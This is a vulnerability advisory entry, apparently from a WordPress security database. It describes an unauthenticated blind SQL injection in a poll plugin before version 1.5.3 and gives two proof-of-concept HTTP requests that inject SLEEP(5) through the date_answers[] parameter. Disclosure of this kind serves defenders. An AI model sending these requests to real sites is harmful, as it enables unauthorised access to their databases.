logo
DATABASE RESOURCES PRICING ABOUT US

Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection

Description

The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks ### PoC v < 1.5.3 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done] Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5) v < 1.5.1 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5)


Affected Software


CPE Name Name Version
polls-widget 1.5.3

Related